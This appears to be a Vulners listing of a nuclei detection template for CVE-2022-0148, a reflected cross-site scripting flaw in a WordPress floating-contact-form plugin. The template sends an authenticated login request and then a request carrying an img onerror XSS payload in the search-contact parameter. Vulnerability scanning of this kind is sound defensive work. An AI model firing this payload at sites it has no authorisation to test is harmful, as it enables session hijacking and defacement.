Lucene search
K

WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting vulnerabilit

Related
Refs
Code
id: CVE-2022-0148

info:
  name: WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update the WordPress All-in-one Floating Contact Form plugin to version 2.0.4 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148
    - https://plugins.trac.wordpress.org/changeset/2654453/mystickyelements
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0148
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-0148
    cwe-id: CWE-79
    epss-score: 0.01572
    epss-percentile: 0.72325
    cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: premio
    product: mystickyelements
    framework: wordpress
  tags: cve,cve2022,xss,wp-plugin,authenticated,wpscan,wordpress,premio,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src onerror=alert(`document.domain`) x">'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a5a9c642344e5b7c35c1c7c5401d72c8b44d74e6aceee23ec2a06b0cc991d8d2022100f31a98f66943abe7dafd691e7bb27dd6dd3bb6e71d74c732fd505a4c2a8bfa7f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 23.5
CVSS 3.15.4
EPSS0.01572
15